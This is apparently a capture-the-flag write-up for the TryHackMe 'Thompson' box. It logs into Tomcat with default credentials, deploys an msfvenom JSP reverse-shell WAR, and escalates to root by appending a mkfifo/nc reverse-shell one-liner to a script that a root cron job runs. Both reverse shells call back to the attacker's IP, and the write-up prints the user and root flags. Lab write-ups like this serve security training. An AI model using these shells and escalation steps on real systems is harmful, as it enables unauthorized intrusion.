THM: Thompson
Introduction
boot2root machine for FIT and bsides guatemala CTF
This is Thompson from THM. It’s the last one of the bsides guatemala boxes. This one took me 13 minutes. I’m on a roll.
Ports
SSH and an HTTP proxy on port 8080. We’ve got a picture of Tomcat, so it’s probably that, yes?
8080
So, let’s try some default credentials for the manager app:
tomcat:tomcat - no
tomcat:s3cret - yes
That was easy. Okay so now we need a war file:
root@kali:/opt/tryhackme/bsidesthompson# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.10.123 LPORT=1234 -f war > shell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1234We are on.
Privesc
Let’s look around:
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 52118
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash");'
tomcat@ubuntu:/$ cd /home
cd /home
tomcat@ubuntu:/home$ ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x 3 root root 4.0K Aug 14 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14 2019 ..
4.0K drwxr-xr-x 4 jack jack 4.0K Aug 23 2019 jack
tomcat@ubuntu:/home$ cd jack
cd ls jack
tomcat@ubuntu:/home/jack$ -lash
ls -lash
total 48K
4.0K drwxr-xr-x 4 jack jack 4.0K Aug 23 2019 .
4.0K drwxr-xr-x 3 root root 4.0K Aug 14 2019 ..
4.0K -rw------- 1 root root 1.5K Aug 14 2019 .bash_history
4.0K -rw-r--r-- 1 jack jack 220 Aug 14 2019 .bash_logout
4.0K -rw-r--r-- 1 jack jack 3.7K Aug 14 2019 .bashrc
4.0K drwx------ 2 jack jack 4.0K Aug 14 2019 .cache
4.0K -rwxrwxrwx 1 jack jack 26 Aug 14 2019 id.sh
4.0K drwxrwxr-x 2 jack jack 4.0K Aug 14 2019 .nano
4.0K -rw-r--r-- 1 jack jack 655 Aug 14 2019 .profile
0 -rw-r--r-- 1 jack jack 0 Aug 14 2019 .sudo_as_admin_successful
4.0K -rw-r--r-- 1 root root 39 Jan 3 00:59 test.txt
4.0K -rw-rw-r-- 1 jack jack 33 Aug 14 2019 user.txt
4.0K -rw-r--r-- 1 root root 183 Aug 14 2019 .wget-hsts
tomcat@ubuntu:/home/jack$ cat user.txt
cat user.txt
39400c90bc683a41a8935e4719f181bf
tomcat@ubuntu:/home/jack$ cat test.txt
cat test.txt
uid=0(root) gid=0(root) groups=0(root)
tomcat@ubuntu:/home/jack$ file id.sh
file id.sh
id.sh: Bourne-Again shell script, ASCII text executable
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
tomcat@ubuntu:/home/jack$ ./id.sh
./id.sh
./id.sh: line 2: test.txt: Permission deniedOkay, so we have one user with a shell script that we can’t run but which appears to have been run by root. Hmmm. Let’s check the crontab:
tomcat@ubuntu:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the 'crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root cd /home/jack && bash id.sh
#
tomcat@ubuntu:/$ cd /home/jackSo there it is; a cron job running as root and executing our shell script. We’ll append some code for a reverse shell and start a new listener:
tomcat@ubuntu:/home/jack$ printf 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/f\n' >> id.sh
tomcat@ubuntu:/home/jack$ cat id.sh
cat id.sh
#!/bin/bash
id > test.txt
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1235 >/tmp/fGreat, let’s check our listener:
root@kali:/opt/tryhackme/bsidesthompson# nc -nvlp 1235
listening on [any] 1235 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.167.40] 35420
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Aug 14 2019 .
4.0K drwxr-xr-x 22 root root 4.0K Aug 14 2019 ..
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwxr-xr-x 2 root root 4.0K Aug 14 2019 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 33 Aug 14 2019 root.txt
cat# root.txt
d89d5391984c0450a95497153ae7ca3aAnd another one done.